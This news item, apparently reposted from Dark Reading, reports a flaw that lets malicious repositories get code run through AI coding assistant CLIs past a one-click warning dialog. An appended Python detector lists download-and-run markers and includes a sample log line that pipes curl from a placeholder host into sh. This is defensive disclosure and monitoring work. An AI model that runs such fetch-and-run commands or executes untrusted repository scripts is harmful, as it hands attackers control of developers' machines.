HackMyIP
2026-05-07 Dark Reading

TrustFall Flaw Exposes Code Execution in Claude, Cursor, Gemini, CoPilot

Vulnerability, Supply Chain, LLM Security

Security researchers at the TrustFall convention have disclosed a critical vulnerability that allows malicious code repositories to trigger arbitrary code execution in several popular AI‑powered coding assistants. The flaw impacts Claude Code (Anthropic), Cursor CLI, Gemini CLI (Google) and CoPilot CLI (Microsoft/GitHub). By embedding a specially crafted payload in a repository, an attacker can cause the assistants to execute code with little or no user interaction, exploiting the tools’ default behavior of running retrieved scripts in a sandboxed environment.

The weakness lies in the way the assistants resolve and execute external scripts without sufficiently validating their origin or integrity. When a developer clones or pulls a repository, the assistant automatically scans for build or run scripts and presents a minimal warning dialog that can be bypassed or dismissed with a single click. Because the dialog does not display the script’s full path or request explicit confirmation, the malicious code runs silently, giving the attacker a foothold on the victim’s workstation.

The implications are severe for supply‑chain security. An adversary could publish a seemingly benign library or template that, once imported, automatically runs the hidden payload on any machine that uses the affected AI tools. This method circumvents traditional detection mechanisms that rely on user‑initiated execution, making it attractive for targeted attacks, espionage campaigns, or mass exploitation through public package registries.

Anthropic, Google, Microsoft and Cursor have been notified and are working on patches. In the meantime, users are advised to disable automatic script execution in their CLI settings, audit repository sources before cloning, and apply strict network policies to limit outbound connections from development environments. Organizations should also consider enabling code‑signing verification and monitoring for unusual process creation triggered by AI assistants.
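As an added illustration of the last recommendation above (monitoring for process creation triggered by AI assistants), not code from the article or from any of the vendors named in it: a small Python scan over constructed process-creation log lines that flags shells or interpreters spawned by an assistant CLI and rates a hit higher when the command line fetches and pipes content into a shell. The assistant executable names, the log format and all paths are assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional

# Assumed executable names of the affected assistant CLIs (assumption, not from the article).
ASSISTANT_PARENTS = {"claude", "cursor", "gemini", "copilot"}
# Shells and interpreters whose launch by an assistant merits review.
SCRIPT_RUNNERS = {"sh", "bash", "zsh", "python", "python3", "node", "npm", "make"}
# Download-and-run markers that raise a hit to high severity.
FETCH_MARKERS = ("curl ", "wget ", "| sh", "| bash")

@dataclass
class Finding:
    ts: str
    parent: str
    image: str
    cmdline: str
    severity: str

def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(line: str) -> Optional[Finding]:
    """Return a Finding when an assistant CLI spawned a shell/interpreter, else None.
    Constructed line format: timestamp|parent_image|image|cmdline (EDR-style export)."""
    ts, parent, image, cmdline = (f.strip() for f in line.split("|", 3))
    if _basename(parent) not in ASSISTANT_PARENTS or _basename(image) not in SCRIPT_RUNNERS:
        return None
    severity = "high" if any(m in cmdline for m in FETCH_MARKERS) else "medium"
    return Finding(ts, parent, image, cmdline, severity)

def scan(lines: List[str]) -> List[Finding]:
    return [f for f in map(classify, lines) if f is not None]

# Constructed sample log; paths and the hostname are placeholders.
SAMPLE_LOG = [
    "2026-05-07T10:00:01|/usr/bin/bash|/usr/bin/git|git pull origin main",
    "2026-05-07T10:00:05|/usr/local/bin/claude|/usr/bin/bash|bash ./scripts/setup.sh",
    "2026-05-07T10:00:06|/usr/local/bin/cursor|/usr/bin/sh|sh -c 'curl -s https://example.invalid/bootstrap | sh'",
    "2026-05-07T10:00:09|/usr/local/bin/gemini|/usr/bin/ls|ls -la",
    "2026-05-07T10:00:12|/usr/bin/zsh|/usr/bin/python3|python3 manage.py test",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity}] {f.ts} {_basename(f.parent)} -> {f.image}: {f.cmdline}")
```

Only the second and third sample lines are flagged: a plain `ls` under an assistant and a shell started by an interactive terminal do not match the parent-plus-runner rule.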

Source: Dark Reading
